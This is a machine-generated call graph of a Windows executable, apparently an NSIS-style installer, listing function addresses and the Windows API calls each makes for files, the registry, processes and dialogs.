3842->3846 3843->3837 3849 403c4a 18 API calls 3843->3849 3847 403a71 3844->3847 3848 403a9e 3845->3848 3850 403aae 3846->3850 3847->3840 3848->3842 3851 405ba5 2 API calls 3848->3851 3852 403b88 3849->3852 3932 406284 lstrcpynW 3850->3932 3851->3842 3854 403b94 ShowWindow 3852->3854 3855 403c17 3852->3855 3857 4065ee 3 API calls 3854->3857 3856 4053bf 5 API calls 3855->3856 3858 403c1d 3856->3858 3859 403bac 3857->3859 3860 403c21 3858->3860 3861 403c39 3858->3861 3862 403bba GetClassInfoW 3859->3862 3864 4065ee 3 API calls 3859->3864 3860->3837 3868 40140b 2 API calls 3860->3868 3863 40140b 2 API calls 3861->3863 3865 403be4 DialogBoxParamW 3862->3865 3866 403bce GetClassInfoW RegisterClassW 3862->3866 3863->3837 3864->3862 3867 40140b 2 API calls 3865->3867 3866->3865 3867->3837 3868->3837 3869->3715 3934 406284 lstrcpynW 3870->3934 3872 405c72 3873 405c04 4 API calls 3872->3873 3874 405c78 3873->3874 3875 40369a 3874->3875 3876 406518 5 API calls 3874->3876 3875->3769 3884 406284 lstrcpynW 3875->3884 3882 405c88 3876->3882 3877 405cb9 lstrlenW 3878 405cc4 3877->3878 3877->3882 3880 405b59 3 API calls 3878->3880 3879 4065c7 2 API calls 3879->3882 3881 405cc9 GetFileAttributesW 3880->3881 3881->3875 3882->3875 3882->3877 3882->3879 3883 405ba5 2 API calls 3882->3883 3883->3877 3884->3749 3885->3716 3887 4038b2 3886->3887 3888 4038a4 CloseHandle 3886->3888 3935 4038df 3887->3935 3888->3887 3893->3759 3894->3768 3896 40606b 3895->3896 3897 40605e 3895->3897 3896->3768 3985 405ed0 3897->3985 3900 405db6 GetTickCount GetTempFileNameW 3899->3900 3901 403357 3900->3901 3902 405dec 3900->3902 3901->3705 3902->3900 3902->3901 3903->3787 3904->3789 3906 405bb3 3905->3906 3907 402f49 3906->3907 3908 405bb9 CharPrevW 3906->3908 3909 406284 lstrcpynW 3907->3909 3908->3906 3908->3907 3909->3793 3911 402e82 3910->3911 3912 402e9a 3910->3912 3913 402e92 3911->3913 3914 402e8b DestroyWindow 3911->3914 3915 402ea2 3912->3915 3916 402eaa GetTickCount 3912->3916 3913->3796 3914->3913 3917 40669a 2 API calls 3915->3917 3918 402eb8 CreateDialogParamW ShowWindow 3916->3918 3919 402edb 3916->3919 3920 402ea8 3917->3920 3918->3919 3919->3796 3920->3796 3921->3802 3922->3804 3924 403c5e 3923->3924 3933 4061cb wsprintfW 3924->3933 3926 403ccf 3927 403d03 18 API calls 3926->3927 3929 403cd4 3927->3929 3928 4039ff 3928->3826 3929->3928 3930 4062a6 17 API calls 3929->3930 3930->3929 3931->3823 3932->3828 3933->3926 3934->3872 3936 4038ed 3935->3936 3937 4038b7 3936->3937 3938 4038f2 FreeLibrary GlobalFree 3936->3938 3939 405996 3937->3939 3938->3937 3938->3938 3940 405c61 18 API calls 3939->3940 3941 4059b6 3940->3941 3942 4059d5 3941->3942 3943 4059be DeleteFileW 3941->3943 3948 405af5 3942->3948 3975 406284 lstrcpynW 3942->3975 3972 4036cd OleUninitialize 3943->3972 3945 4059fb 3946 405a01 lstrcatW 3945->3946 3947 405a0e 3945->3947 3950 405a14 3946->3950 3951 405ba5 2 API calls 3947->3951 3949 4065c7 2 API calls 3948->3949 3948->3972 3952 405b1a 3949->3952 3953 405a24 lstrcatW 3950->3953 3954 405a2f lstrlenW FindFirstFileW 3950->3954 3951->3950 3955 405b59 3 API calls 3952->3955 3952->3972 3953->3954 3954->3948 3973 405a51 3954->3973 3956 405b24 3955->3956 3958 40594e 5 API calls 3956->3958 3957 405ad8 FindNextFileW 3961 405aee FindClose 3957->3961 3957->3973 3960 405b30 3958->3960 3962 405b34 3960->3962 3963 405b4a 3960->3963 3961->3948 3966 4052ec 24 API calls 3962->3966 3962->3972 3965 4052ec 24 API calls 3963->3965 3965->3972 3968 405b41 3966->3968 3967 405996 60 API calls 3967->3973 3970 40604a 36 API calls 3968->3970 3969 4052ec 24 API calls 3969->3957 3970->3972 3971 4052ec 24 API calls 3971->3973 3972->3725 3972->3726 3973->3957 3973->3967 3973->3969 3973->3971 3974 40604a 36 API calls 3973->3974 3976 406284 lstrcpynW 3973->3976 3977 40594e 3973->3977 3974->3973 3975->3945 3976->3973 3978 405d55 2 API calls 3977->3978 3979 40595a 3978->3979 3980 40597b 3979->3980 3981 405971 DeleteFileW 3979->3981 3982 405969 RemoveDirectoryW 3979->3982 3980->3973 3983 405977 3981->3983 3982->3983 3983->3980 3984 405987 SetFileAttributesW 3983->3984 3984->3980 3986 405f00 3985->3986 3987 405f26 GetShortPathNameW 3985->3987 4012 405d7a GetFileAttributesW CreateFileW 3986->4012 3989 406045 3987->3989 3990 405f3b 3987->3990 3989->3896 3990->3989 3992 405f43 wsprintfA 3990->3992 3991 405f0a CloseHandle GetShortPathNameW 3991->3989 3993 405f1e 3991->3993 3994 4062a6 17 API calls 3992->3994 3993->3987 3993->3989 3995 405f6b 3994->3995 4013 405d7a GetFileAttributesW CreateFileW 3995->4013 3997 405f78 3997->3989 3998 405f87 GetFileSize GlobalAlloc 3997->3998 3999 405fa9 3998->3999 4000 40603e CloseHandle 3998->4000 4001 405dfd ReadFile 3999->4001 4000->3989 4002 405fb1 4001->4002 4002->4000 4014 405cdf lstrlenA 4002->4014 4005 405fc8 lstrcpyA 4008 405fea 4005->4008 4006 405fdc 4007 405cdf 4 API calls 4006->4007 4007->4008 4009 406021 SetFilePointer 4008->4009 4010 405e2c WriteFile 4009->4010 4011 406037 GlobalFree 4010->4011 4011->4000 4012->3991 4013->3997 4015 405d20 lstrlenA 4014->4015 4016 405d28 4015->4016 4017 405cf9 lstrcmpiA 4015->4017 4016->4005 4016->4006 4017->4016 4018 405d17 CharNextA 4017->4018 4018->4015 4123 402259 4124 402c41 17 API calls 4123->4124 4125 40225f 4124->4125 4126 402c41 17 API calls 4125->4126 4127 402268 4126->4127 4128 402c41 17 API calls 4127->4128 4129 402271 4128->4129 4130 4065c7 2 API calls 4129->4130 4131 40227a 4130->4131 4132 40228b lstrlenW lstrlenW 4131->4132 4137 40227e 4131->4137 4134 4052ec 24 API calls 4132->4134 4133 4052ec 24 API calls 4136 402286 4133->4136 4135 4022c9 SHFileOperationW 4134->4135 4135->4136 4135->4137 4137->4133 4137->4136 4145 40175c 4146 402c41 17 API calls 4145->4146 4147 401763 4146->4147 4148 405da9 2 API calls 4147->4148 4149 40176a 4148->4149 4149->4149 4150 401d5d GetDlgItem GetClientRect 4151 402c41 17 API calls 4150->4151 4152 401d8f LoadImageW SendMessageW 4151->4152 4153 402ac5 4152->4153 4154 401dad DeleteObject 4152->4154 4154->4153 4155 4022dd 4156 4022e4 4155->4156 4158 4022f7 4155->4158 4157 4062a6 17 API calls 4156->4157 4159 4022f1 4157->4159 4160 4058ea MessageBoxIndirectW 4159->4160 4160->4158 4161 405260 4162 405270 4161->4162 4163 405284 4161->4163 4164 405276 4162->4164 4165 4052cd 4162->4165 4166 40528c IsWindowVisible 4163->4166 4172 4052a3 4163->4172 4168 404247 SendMessageW 4164->4168 4167 4052d2 CallWindowProcW 4165->4167 4166->4165 4169 405299 4166->4169 4170 405280 4167->4170 4168->4170 4174 404bb6 SendMessageW 4169->4174 4172->4167 4179 404c36 4172->4179 4175 404c15 SendMessageW 4174->4175 4176 404bd9 GetMessagePos ScreenToClient SendMessageW 4174->4176 4178 404c0d 4175->4178 4177 404c12 4176->4177 4176->4178 4177->4175 4178->4172 4188 406284 lstrcpynW 4179->4188 4181 404c49 4189 4061cb wsprintfW 4181->4189 4183 404c53 4184 40140b 2 API calls 4183->4184 4185 404c5c 4184->4185 4190 406284 lstrcpynW 4185->4190 4187 404c63 4187->4165 4188->4181 4189->4183 4190->4187 4191 401563 4192 402a6b 4191->4192 4195 4061cb wsprintfW 4192->4195 4194 402a70 4195->4194 3351 4023e4 3352 402c41 17 API calls 3351->3352 3353 4023f6 3352->3353 3354 402c41 17 API calls 3353->3354 3355 402400 3354->3355 3368 402cd1 3355->3368 3358 402ac5 3359 402438 3364 402444 3359->3364 3372 402c1f 3359->3372 3360 402c41 17 API calls 3361 40242e lstrlenW 3360->3361 3361->3359 3363 402463 RegSetValueExW 3366 402479 RegCloseKey 3363->3366 3364->3363 3375 403116 3364->3375 3366->3358 3369 402cec 3368->3369 3396 40611f 3369->3396 3373 4062a6 17 API calls 3372->3373 3374 402c34 3373->3374 3374->3364 3376 40312f 3375->3376 3377 40315a 3376->3377 3412 403311 SetFilePointer 3376->3412 3400 4032fb 3377->3400 3381 403177 GetTickCount 3392 40318a 3381->3392 3382 40329b 3383 40329f 3382->3383 3388 4032b7 3382->3388 3385 4032fb ReadFile 3383->3385 3384 403285 3384->3363 3385->3384 3386 4032fb ReadFile 3386->3388 3387 4032fb ReadFile 3387->3392 3388->3384 3388->3386 3389 405e2c WriteFile 3388->3389 3389->3388 3391 4031f0 GetTickCount 3391->3392 3392->3384 3392->3387 3392->3391 3393 403219 MulDiv wsprintfW 3392->3393 3403 4067df 3392->3403 3410 405e2c WriteFile 3392->3410 3394 4052ec 24 API calls 3393->3394 3394->3392 3397 40612e 3396->3397 3398 402410 3397->3398 3399 406139 RegCreateKeyExW 3397->3399 3398->3358 3398->3359 3398->3360 3399->3398 3413 405dfd ReadFile 3400->3413 3404 406804 3403->3404 3405 40680c 3403->3405 3404->3392 3405->3404 3406 406893 GlobalFree 3405->3406 3407 40689c GlobalAlloc 3405->3407 3408 406913 GlobalAlloc 3405->3408 3409 40690a GlobalFree 3405->3409 3406->3407 3407->3404 3407->3405 3408->3404 3408->3405 3409->3408 3411 405e4a 3410->3411 3411->3392 3412->3377 3414 403165 3413->3414 3414->3381 3414->3382 3414->3384 3459 402868 3460 402c41 17 API calls 3459->3460 3461 40286f FindFirstFileW 3460->3461 3462 402897 3461->3462 3466 402882 3461->3466 3467 4061cb wsprintfW 3462->3467 3464 4028a0 3468 406284 lstrcpynW 3464->3468 3467->3464 3468->3466 4196 404c68 GetDlgItem GetDlgItem 4197 404cba 7 API calls 4196->4197 4212 404ed3 4196->4212 4198 404d50 SendMessageW 4197->4198 4199 404d5d DeleteObject 4197->4199 4198->4199 4200 404d66 4199->4200 4202 404d9d 4200->4202 4205 4062a6 17 API calls 4200->4205 4201 404fb7 4204 405063 4201->4204 4207 404ec6 4201->4207 4215 405010 SendMessageW 4201->4215 4203 4041fb 18 API calls 4202->4203 4206 404db1 4203->4206 4209 405075 4204->4209 4210 40506d SendMessageW 4204->4210 4211 404d7f SendMessageW SendMessageW 4205->4211 4214 4041fb 18 API calls 4206->4214 4216 404262 8 API calls 4207->4216 4208 404f44 4208->4201 4217 404fa9 SendMessageW 4208->4217 4218 405087 ImageList_Destroy 4209->4218 4219 40508e 4209->4219 4226 40509e 4209->4226 4210->4209 4211->4200 4212->4201 4212->4208 4213 404bb6 5 API calls 4212->4213 4213->4208 4229 404dbf 4214->4229 4215->4207 4221 405025 SendMessageW 4215->4221 4222 405259 4216->4222 4217->4201 4218->4219 4223 405097 GlobalFree 4219->4223 4219->4226 4220 40520d 4220->4207 4227 40521f ShowWindow GetDlgItem ShowWindow 4220->4227 4225 405038 4221->4225 4223->4226 4224 404e94 GetWindowLongW SetWindowLongW 4228 404ead 4224->4228 4235 405049 SendMessageW 4225->4235 4226->4220 4239 404c36 4 API calls 4226->4239 4241 4050d9 4226->4241 4227->4207 4230 404eb3 ShowWindow 4228->4230 4231 404ecb 4228->4231 4229->4224 4234 404e0f SendMessageW 4229->4234 4236 404e8e 4229->4236 4237 404e4b SendMessageW 4229->4237 4238 404e5c SendMessageW 4229->4238 4247 404230 SendMessageW 4230->4247 4248 404230 SendMessageW 4231->4248 4234->4229 4235->4204 4236->4224 4236->4228 4237->4229 4238->4229 4239->4241 4240 4051e3 InvalidateRect 4240->4220 4242 4051f9 4240->4242 4243 405107 SendMessageW 4241->4243 4246 40511d 4241->4246 4249 404b71 4242->4249 4243->4246 4245 405191 SendMessageW SendMessageW 4245->4246 4246->4240 4246->4245 4247->4207 4248->4212 4252 404aa8 4249->4252 4251 404b86 4251->4220 4253 404ac1 4252->4253 4254 4062a6 17 API calls 4253->4254 4255 404b25 4254->4255 4256 4062a6 17 API calls 4255->4256 4257 404b30 4256->4257 4258 4062a6 17 API calls 4257->4258 4259 404b46 lstrlenW wsprintfW SetDlgItemTextW 4258->4259 4259->4251 4260 401968 4261 402c1f 17 API calls 4260->4261 4262 40196f 4261->4262 4263 402c1f 17 API calls 4262->4263 4264 40197c 4263->4264 4265 402c41 17 API calls 4264->4265 4266 401993 lstrlenW 4265->4266 4268 4019a4 4266->4268 4267 4019e5 4268->4267 4272 406284 lstrcpynW 4268->4272 4270 4019d5 4270->4267 4271 4019da lstrlenW 4270->4271 4271->4267 4272->4270 4273 40166a 4274 402c41 17 API calls 4273->4274 4275 401670 4274->4275 4276 4065c7 2 API calls 4275->4276 4277 401676 4276->4277 4278 40436b lstrlenW 4279 40438a 4278->4279 4280 40438c WideCharToMultiByte 4278->4280 4279->4280 4281 4046ec 4282 404718 4281->4282 4283 404729 4281->4283 4342 4058ce GetDlgItemTextW 4282->4342 4285 404735 GetDlgItem 4283->4285 4291 404794 4283->4291 4287 404749 4285->4287 4286 404723 4289 406518 5 API calls 4286->4289 4293 40475d SetWindowTextW 4287->4293 4298 405c04 4 API calls 4287->4298 4288 404878 4290 404a27 4288->4290 4344 4058ce GetDlgItemTextW 4288->4344 4289->4283 4297 404262 8 API calls 4290->4297 4291->4288 4291->4290 4294 4062a6 17 API calls 4291->4294 4296 4041fb 18 API calls 4293->4296 4299 404808 SHBrowseForFolderW 4294->4299 4295 4048a8 4300 405c61 18 API calls 4295->4300 4301 404779 4296->4301 4302 404a3b 4297->4302 4303 404753 4298->4303 4299->4288 4304 404820 CoTaskMemFree 4299->4304 4305 4048ae 4300->4305 4306 4041fb 18 API calls 4301->4306 4303->4293 4307 405b59 3 API calls 4303->4307 4308 405b59 3 API calls 4304->4308 4345 406284 lstrcpynW 4305->4345 4309 404787 4306->4309 4307->4293 4310 40482d 4308->4310 4343 404230 SendMessageW 4309->4343 4313 404864 SetDlgItemTextW 4310->4313 4318 4062a6 17 API calls 4310->4318 4313->4288 4314 40478d 4316 40665e 5 API calls 4314->4316 4315 4048c5 4317 40665e 5 API calls 4315->4317 4316->4291 4325 4048cc 4317->4325 4319 40484c lstrcmpiW 4318->4319 4319->4313 4322 40485d lstrcatW 4319->4322 4320 40490d 4346 406284 lstrcpynW 4320->4346 4322->4313 4323 404914 4324 405c04 4 API calls 4323->4324 4326 40491a GetDiskFreeSpaceW 4324->4326 4325->4320 4328 405ba5 2 API calls 4325->4328 4330 404965 4325->4330 4329 40493e MulDiv 4326->4329 4326->4330 4328->4325 4329->4330 4331 4049d6 4330->4331 4332 404b71 20 API calls 4330->4332 4333 4049f9 4331->4333 4335 40140b 2 API calls 4331->4335 4334 4049c3 4332->4334 4347 40421d KiUserCallbackDispatcher 4333->4347 4337 4049d8 SetDlgItemTextW 4334->4337 4338 4049c8 4334->4338 4335->4333 4337->4331 4340 404aa8 20 API calls 4338->4340 4339 404a15 4339->4290 4348 404645 4339->4348 4340->4331 4342->4286 4343->4314 4344->4295 4345->4315 4346->4323 4347->4339 4349 404653 4348->4349 4350 404658 SendMessageW 4348->4350 4349->4350 4350->4290 3596 40176f 3597 402c41 17 API calls 3596->3597 3598 401776 3597->3598 3599 401796 3598->3599 3600 40179e 3598->3600 3638 406284 lstrcpynW 3599->3638 3639 406284 lstrcpynW 3600->3639 3603 4017a9 3640 405b59 lstrlenW CharPrevW 3603->3640 3604 40179c 3607 406518 5 API calls 3604->3607 3618 4017bb 3607->3618 3611 4017cd CompareFileTime 3611->3618 3612 40188d 3613 4052ec 24 API calls 3612->3613 3616 401897 3613->3616 3614 4052ec 24 API calls 3617 401879 3614->3617 3615 406284 lstrcpynW 3615->3618 3619 403116 35 API calls 3616->3619 3618->3611 3618->3612 3618->3615 3622 4062a6 17 API calls 3618->3622 3633 401864 3618->3633 3634 405d55 GetFileAttributesW 3618->3634 3637 405d7a GetFileAttributesW CreateFileW 3618->3637 3643 4065c7 FindFirstFileW 3618->3643 3646 4058ea 3618->3646 3620 4018aa 3619->3620 3621 4018be SetFileTime 3620->3621 3623 4018d0 CloseHandle 3620->3623 3621->3623 3622->3618 3623->3617 3624 4018e1 3623->3624 3625 4018e6 3624->3625 3626 4018f9 3624->3626 3627 4062a6 17 API calls 3625->3627 3628 4062a6 17 API calls 3626->3628 3629 4018ee lstrcatW 3627->3629 3630 401901 3628->3630 3629->3630 3632 4058ea MessageBoxIndirectW 3630->3632 3632->3617 3633->3614 3633->3617 3635 405d74 3634->3635 3636 405d67 SetFileAttributesW 3634->3636 3635->3618 3636->3635 3637->3618 3638->3604 3639->3603 3641 4017af lstrcatW 3640->3641 3642 405b75 lstrcatW 3640->3642 3641->3604 3642->3641 3644 4065dd FindClose 3643->3644 3645 4065e8 3643->3645 3644->3645 3645->3618 3647 4058ff 3646->3647 3648 40594b 3647->3648 3649 405913 MessageBoxIndirectW 3647->3649 3648->3618 3649->3648 4351 4027ef 4352 4027f6 4351->4352 4354 402a70 4351->4354 4353 402c1f 17 API calls 4352->4353 4355 4027fd 4353->4355 4356 40280c SetFilePointer 4355->4356 4356->4354 4357 40281c 4356->4357 4359 4061cb wsprintfW 4357->4359 4359->4354 4360 401a72 4361 402c1f 17 API calls 4360->4361 4362 401a7b 4361->4362 4363 402c1f 17 API calls 4362->4363 4364 401a20 4363->4364 3651 401573 3652 401583 ShowWindow 3651->3652 3653 40158c 3651->3653 3652->3653 3654 402ac5 3653->3654 3655 40159a ShowWindow 3653->3655 3655->3654 4372 402df3 4373 402e05 SetTimer 4372->4373 4375 402e1e 4372->4375 4373->4375 4374 402e73 4375->4374 4376 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4375->4376 4376->4374 4377 401cf3 4378 402c1f 17 API calls 4377->4378 4379 401cf9 IsWindow 4378->4379 4380 401a20 4379->4380 4381 4014f5 SetForegroundWindow 4382 402ac5 4381->4382 4383 402576 4384 402c41 17 API calls 4383->4384 4385 40257d 4384->4385 4388 405d7a GetFileAttributesW CreateFileW 4385->4388 4387 402589 4388->4387 3660 401b77 3661 401b84 3660->3661 3662 401bc8 3660->3662 3663 4022e4 3661->3663 3669 401b9b 3661->3669 3664 401bf2 GlobalAlloc 3662->3664 3665 401bcd 3662->3665 3666 4062a6 17 API calls 3663->3666 3667 4062a6 17 API calls 3664->3667 3673 401c0d 3665->3673 3681 406284 lstrcpynW 3665->3681 3668 4022f1 3666->3668 3667->3673 3675 4058ea MessageBoxIndirectW 3668->3675 3679 406284 lstrcpynW 3669->3679 3672 401bdf GlobalFree 3672->3673 3674 401baa 3680 406284 lstrcpynW 3674->3680 3675->3673 3677 401bb9 3682 406284 lstrcpynW 3677->3682 3679->3674 3680->3677 3681->3672 3682->3673 4389 4024f8 4390 402c81 17 API calls 4389->4390 4391 402502 4390->4391 4392 402c1f 17 API calls 4391->4392 4393 40250b 4392->4393 4394 402533 RegEnumValueW 4393->4394 4395 402527 RegEnumKeyW 4393->4395 4397 40288b 4393->4397 4396 402548 RegCloseKey 4394->4396 4395->4396 4396->4397 4399 40167b 4400 402c41 17 API calls 4399->4400 4401 401682 4400->4401 4402 402c41 17 API calls 4401->4402 4403 40168b 4402->4403 4404 402c41 17 API calls 4403->4404 4405 401694 MoveFileW 4404->4405 4406 4016a0 4405->4406 4407 4016a7 4405->4407 4408 401423 24 API calls 4406->4408 4409 4065c7 2 API calls 4407->4409 4411 402250 4407->4411 4408->4411 4410 4016b6 4409->4410 4410->4411 4412 40604a 36 API calls 4410->4412 4412->4406 4413 401e7d 4414 402c41 17 API calls 4413->4414 4415 401e83 4414->4415 4416 402c41 17 API calls 4415->4416 4417 401e8c 4416->4417 4418 402c41 17 API calls 4417->4418 4419 401e95 4418->4419 4420 402c41 17 API calls 4419->4420 4421 401e9e 4420->4421 4422 401423 24 API calls 4421->4422 4423 401ea5 4422->4423 4430 4058b0 ShellExecuteExW 4423->4430 4425 401ee7 4426 40670f 5 API calls 4425->4426 4428 40288b 4425->4428 4427 401f01 CloseHandle 4426->4427 4427->4428 4430->4425 4431 4019ff 4432 402c41 17 API calls 4431->4432 4433 401a06 4432->4433 4434 402c41 17 API calls 4433->4434 4435 401a0f 4434->4435 4436 401a16 lstrcmpiW 4435->4436 4437 401a28 lstrcmpW 4435->4437 4438 401a1c 4436->4438 4437->4438 4439 401000 4440 401037 BeginPaint GetClientRect 4439->4440 4441 40100c DefWindowProcW 4439->4441 4443 4010f3 4440->4443 4444 401179 4441->4444 4445 401073 CreateBrushIndirect FillRect DeleteObject 4443->4445 4446 4010fc 4443->4446 4445->4443 4447 401102 CreateFontIndirectW 4446->4447 4448 401167 EndPaint 4446->4448 4447->4448 4449 401112 6 API calls 4447->4449 4448->4444 4449->4448 4457 401503 4458 40150b 4457->4458 4460 40151e 4457->4460 4459 402c1f 17 API calls 4458->4459 4459->4460 3415 402104 3416 402c41 17 API calls 3415->3416 3417 40210b 3416->3417 3418 402c41 17 API calls 3417->3418 3419 402115 3418->3419 3420 402c41 17 API calls 3419->3420 3421 40211f 3420->3421 3422 402c41 17 API calls 3421->3422 3423 402129 3422->3423 3424 402c41 17 API calls 3423->3424 3426 402133 3424->3426 3425 402172 CoCreateInstance 3430 402191 3425->3430 3426->3425 3427 402c41 17 API calls 3426->3427 3427->3425 3428 401423 24 API calls 3429 402250 3428->3429 3430->3428 3430->3429 4461 402484 4462 402c81 17 API calls 4461->4462 4463 40248e 4462->4463 4464 402c41 17 API calls 4463->4464 4465 402497 4464->4465 4466 4024a2 RegQueryValueExW 4465->4466 4467 40288b 4465->4467 4468 4024c2 4466->4468 4471 4024c8 RegCloseKey 4466->4471 4468->4471 4472 4061cb wsprintfW 4468->4472 4471->4467 4472->4471 3431 401f06 3432 402c41 17 API calls 3431->3432 3433 401f0c 3432->3433 3434 4052ec 24 API calls 3433->3434 3435 401f16 3434->3435 3446 40586d CreateProcessW 3435->3446 3438 401f3f CloseHandle 3442 40288b 3438->3442 3441 401f31 3443 401f41 3441->3443 3444 401f36 3441->3444 3443->3438 3454 4061cb wsprintfW 3444->3454 3447 4058a0 CloseHandle 3446->3447 3448 401f1c 3446->3448 3447->3448 3448->3438 3448->3442 3449 40670f WaitForSingleObject 3448->3449 3450 406729 3449->3450 3451 40673b GetExitCodeProcess 3450->3451 3455 40669a 3450->3455 3451->3441 3454->3438 3456 4066b7 PeekMessageW 3455->3456 3457 4066c7 WaitForSingleObject 3456->3457 3458 4066ad DispatchMessageW 3456->3458 3457->3450 3458->3456 3527 40230c 3528 402314 3527->3528 3529 40231a 3527->3529 3530 402c41 17 API calls 3528->3530 3531 402c41 17 API calls 3529->3531 3533 402328 3529->3533 3530->3529 3531->3533 3532 402336 3535 402c41 17 API calls 3532->3535 3533->3532 3534 402c41 17 API calls 3533->3534 3534->3532 3536 40233f WritePrivateProfileStringW 3535->3536 3537 401f8c 3538 402c41 17 API calls 3537->3538 3539 401f93 3538->3539 3540 40665e 5 API calls 3539->3540 3541 401fa2 GetFileVersionInfoSizeW 3540->3541 3542 402ac5 3541->3542 3543 401fbe GlobalAlloc 3541->3543 3543->3542 3544 401fd2 3543->3544 3545 40665e 5 API calls 3544->3545 3546 401fd9 3545->3546 3547 40665e 5 API calls 3546->3547 3549 401fe3 3547->3549 3548 402026 3548->3542 3549->3548 3553 4061cb wsprintfW 3549->3553 3551 402018 3554 4061cb wsprintfW 3551->3554 3553->3551 3554->3548 4473 40190c 4474 401943 4473->4474 4475 402c41 17 API calls 4474->4475 4476 401948 4475->4476 4477 405996 67 API calls 4476->4477 4478 401951 4477->4478 3562 40238e 3563 4023c1 3562->3563 3564 402396 3562->3564 3566 402c41 17 API calls 3563->3566 3574 402c81 3564->3574 3568 4023c8 3566->3568 3579 402cff 3568->3579 3569 4023a7 3572 402c41 17 API calls 3569->3572 3571 4023d5 3573 4023ae RegDeleteValueW RegCloseKey 3572->3573 3573->3571 3575 402c41 17 API calls 3574->3575 3576 402c98 3575->3576 3577 4060f1 RegOpenKeyExW 3576->3577 3578 40239d 3577->3578 3578->3569 3578->3571 3580 402d13 3579->3580 3581 402d0c 3579->3581 3580->3581 3583 402d44 3580->3583 3581->3571 3584 4060f1 RegOpenKeyExW 3583->3584 3585 402d72 3584->3585 3586 402dec 3585->3586 3590 402d76 3585->3590 3586->3581 3587 402d98 RegEnumKeyW 3588 402daf RegCloseKey 3587->3588 3587->3590 3591 40665e 5 API calls 3588->3591 3589 402dd0 RegCloseKey 3589->3586 3590->3587 3590->3588 3590->3589 3592 402d44 6 API calls 3590->3592 3593 402dbf 3591->3593 3592->3590 3594 402de0 RegDeleteKeyW 3593->3594 3595 402dc3 3593->3595 3594->3586 3595->3586 4479 40698e 4485 406812 4479->4485 4480 40717d 4481 406893 GlobalFree 4482 40689c GlobalAlloc 4481->4482 4482->4480 4482->4485 4483 406913 GlobalAlloc 4483->4480 4483->4485 4484 40690a GlobalFree 4484->4483 4485->4480 4485->4481 4485->4482 4485->4483 4485->4484 4486 40190f 4487 402c41 17 API calls 4486->4487 4488 401916 4487->4488 4489 4058ea MessageBoxIndirectW 4488->4489 4490 40191f 4489->4490 4491 401491 4492 4052ec 24 API calls 4491->4492 4493 401498 4492->4493 4494 401d14 4495 402c1f 17 API calls 4494->4495 4496 401d1b 4495->4496 4497 402c1f 17 API calls 4496->4497 4498 401d27 GetDlgItem 4497->4498 4499 402592 4498->4499 4500 402994 4501 402c1f 17 API calls 4500->4501 4502 4029ae 4501->4502 4503 4029d5 4502->4503 4504 4029ee 4502->4504 4510 40288b 4502->4510 4505 4029da 4503->4505 4512 4029eb 4503->4512 4506 402a08 4504->4506 4507 4029f8 4504->4507 4514 406284 lstrcpynW 4505->4514 4509 4062a6 17 API calls 4506->4509 4508 402c1f 17 API calls 4507->4508 4508->4512 4509->4512 4512->4510 4515 4061cb wsprintfW 4512->4515 4514->4510 4515->4510 4523 402598 4524 4025c7 4523->4524 4525 4025ac 4523->4525 4527 4025fb 4524->4527 4528 4025cc 4524->4528 4526 402c1f 17 API calls 4525->4526 4534 4025b3 4526->4534 4530 402c41 17 API calls 4527->4530 4529 402c41 17 API calls 4528->4529 4531 4025d3 WideCharToMultiByte lstrlenA 4529->4531 4532 402602 lstrlenW 4530->4532 4531->4534 4532->4534 4533 402645 4534->4533 4536 405e5b 5 API calls 4534->4536 4537 40262f 4534->4537 4535 405e2c WriteFile 4535->4533 4536->4537 4537->4533 4537->4535 4538 40149e 4539 4022f7 4538->4539 4540 4014ac PostQuitMessage 4538->4540 4540->4539 4541 401c1f 4542 402c1f 17 API calls 4541->4542 4543 401c26 4542->4543 4544 402c1f 17 API calls 4543->4544 4545 401c33 4544->4545 4546 401c48 4545->4546 4547 402c41 17 API calls 4545->4547 4548 401c58 4546->4548 4549 402c41 17 API calls 4546->4549 4547->4546 4550 401c63 4548->4550 4551 401caf 4548->4551 4549->4548 4553 402c1f 17 API calls 4550->4553 4552 402c41 17 API calls 4551->4552 4554 401cb4 4552->4554 4555 401c68 4553->4555 4556 402c41 17 API calls 4554->4556 4557 402c1f 17 API calls 4555->4557 4558 401cbd FindWindowExW 4556->4558 4559 401c74 4557->4559 4562 401cdf 4558->4562 4560 401c81 SendMessageTimeoutW 4559->4560 4561 401c9f SendMessageW 4559->4561 4560->4562 4561->4562 4563 402821 4564 402827 4563->4564 4565 40282f FindClose 4564->4565 4566 402ac5 4564->4566 4565->4566 3240 403d22 3241 403e75 3240->3241 3242 403d3a 3240->3242 3243 403ec6 3241->3243 3244 403e86 GetDlgItem GetDlgItem 3241->3244 3242->3241 3245 403d46 3242->3245 3247 403f20 3243->3247 3257 401389 2 API calls 3243->3257 3246 4041fb 18 API calls 3244->3246 3248 403d51 SetWindowPos 3245->3248 3249 403d64 3245->3249 3252 403eb0 SetClassLongW 3246->3252 3272 403e70 3247->3272 3311 404247 3247->3311 3248->3249 3250 403d81 3249->3250 3251 403d69 ShowWindow 3249->3251 3254 403da3 3250->3254 3255 403d89 DestroyWindow 3250->3255 3251->3250 3256 40140b 2 API calls 3252->3256 3258 403da8 SetWindowLongW 3254->3258 3259 403db9 3254->3259 3310 404184 3255->3310 3256->3243 3260 403ef8 3257->3260 3258->3272 3263 403e62 3259->3263 3264 403dc5 GetDlgItem 3259->3264 3260->3247 3265 403efc SendMessageW 3260->3265 3261 40140b 2 API calls 3284 403f32 3261->3284 3262 404186 DestroyWindow EndDialog 3262->3310 3333 404262 3263->3333 3267 403df5 3264->3267 3268 403dd8 SendMessageW IsWindowEnabled 3264->3268 3265->3272 3266 4041b5 ShowWindow 3266->3272 3271 403dfa 3267->3271 3273 403e02 3267->3273 3275 403e49 SendMessageW 3267->3275 3276 403e15 3267->3276 3268->3267 3268->3272 3270 4062a6 17 API calls 3270->3284 3330 4041d4 3271->3330 3273->3271 3273->3275 3275->3263 3277 403e32 3276->3277 3278 403e1d 3276->3278 3281 40140b 2 API calls 3277->3281 3327 40140b 3278->3327 3279 403e30 3279->3263 3283 403e39 3281->3283 3282 4041fb 18 API calls 3282->3284 3283->3263 3283->3271 3284->3261 3284->3262 3284->3270 3284->3272 3284->3282 3301 4040c6 DestroyWindow 3284->3301 3314 4041fb 3284->3314 3286 403fad GetDlgItem 3287 403fc2 3286->3287 3288 403fca ShowWindow KiUserCallbackDispatcher 3286->3288 3287->3288 3317 40421d KiUserCallbackDispatcher 3288->3317 3290 403ff4 EnableWindow 3295 404008 3290->3295 3291 40400d GetSystemMenu EnableMenuItem SendMessageW 3292 40403d SendMessageW 